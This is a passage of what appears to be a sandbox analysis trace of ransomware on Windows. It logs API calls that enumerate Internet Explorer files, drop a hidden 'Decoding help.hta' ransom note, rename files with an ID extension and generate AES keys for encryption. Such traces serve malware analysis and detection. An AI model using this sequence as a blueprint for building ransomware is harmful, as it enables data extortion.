Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" [0058.455] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0058.455] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.456] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x270 [0058.456] CreateFileMappingA (hFile=0x270, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc7c [0058.456] CryptAcquireContextA (in: phProv=0xb68fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb68fcec*=0x2aac66e8) returned 1 [0060.221] CryptGenKey (in: hProv=0x2aac66e8, Algid=0x6610, dwFlags=0x1, phKey=0xb68fce8 | out: phKey=0xb68fce8*=0x10f14300) returned 1 [0060.221] CryptExportKey (in: hKey=0x10f14300, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb68fbe4, pdwDataLen=0xb68fce4 | out: pbData=0xb68fbe4*, pdwDataLen=0xb68fce4*=0x2c) returned 1 [0060.221] MapViewOfFile (hFileMappingObject=0xc7c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) Thread: id = 126 os_tid = 0x89c [0040.167] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*", lpFindFileData=0xb7cfd30 | out: lpFindFileData=0xb7cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a56f0 [0040.168] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.168] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb7cfd30 | out: lpFindFileData=0xb7cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.169] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.169] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.169] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb7cfd30 | out: lpFindFileData=0xb7cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0040.169] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0040.169] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0040.169] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" [0040.169] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\en-us\\decoding help.hta")) returned 0xffffffff [0040.169] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0041.036] WriteFile (in: hFile=0x304, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xb7cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xb7cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.037] CloseHandle (hObject=0x304) returned 1 [0041.037] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.037] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hmmapi.dll.mui") returned -1 [0041.038] lstrlenW (lpString="hmmapi.dll.mui") returned 14 [0041.038] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.038] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.038] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="hmmapi.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" [0041.038] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" [0041.038] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.085] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb7cfd30 | out: lpFindFileData=0xb7cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="iedvtool.dll.mui", cAlternateFileName="")) returned 1 [0041.085] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.085] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.085] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" [0041.085] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.085] lstrcmpiW (lpString1="Decoding help.hta", lpString2="iedvtool.dll.mui") returned -1 [0041.085] lstrlenW (lpString="iedvtool.dll.mui") returned 16 [0041.086] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.086] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="iedvtool.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui" [0041.086] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui" [0041.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iedvtool.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\en-us\\iedvtool.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.086] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb7cfd30 | out: lpFindFileData=0xb7cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe.mui", cAlternateFileName="")) returned 1 [0041.086] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.086] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" [0041.086] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.086] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ieinstal.exe.mui") returned -1 [0041.086] lstrlenW (lpString="ieinstal.exe.mui") returned 16 [0041.086] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.086] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="ieinstal.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" [0041.086] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" [0041.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.087] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb7cfd30 | out: lpFindFileData=0xb7cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe.mui", cAlternateFileName="")) returned 1 [0041.087] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.087] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.087] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" [0041.087] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.087] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ielowutil.exe.mui") returned -1 [0041.087] lstrlenW (lpString="ielowutil.exe.mui") returned 17 [0041.087] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.087] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.087] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="ielowutil.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui" [0041.087] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui" [0041.087] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.087] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ielowutil.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\en-us\\ielowutil.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.087] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb7cfd30 | out: lpFindFileData=0xb7cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe647cb96, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe647cb96, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xe45e4000, ftLastWriteTime.dwHighDateTime=0x1ca042a, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 1 [0041.087] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.087] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.087] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" [0041.088] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.088] lstrcmpiW (lpString1="Decoding help.hta", lpString2="iexplore.exe.mui") returned -1 [0041.088] lstrlenW (lpString="iexplore.exe.mui") returned 16 [0041.088] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.088] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.088] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="iexplore.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" [0041.088] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" [0041.088] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.088] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb7cfd30 | out: lpFindFileData=0xb7cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdbgui.dll.mui", cAlternateFileName="")) returned 1 [0041.088] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.088] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.088] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" [0041.089] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.089] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jsdbgui.dll.mui") returned -1 [0041.089] lstrlenW (lpString="jsdbgui.dll.mui") returned 15 [0041.089] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.089] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.089] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="jsdbgui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui" [0041.089] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui" [0041.089] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.089] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsdbgui.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\en-us\\jsdbgui.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.089] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb7cfd30 | out: lpFindFileData=0xb7cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdebuggeride.dll.mui", cAlternateFileName="")) returned 1 [0041.089] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.089] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.089] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" [0041.089] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.089] lstrcmpiW (lpString1="Decoding 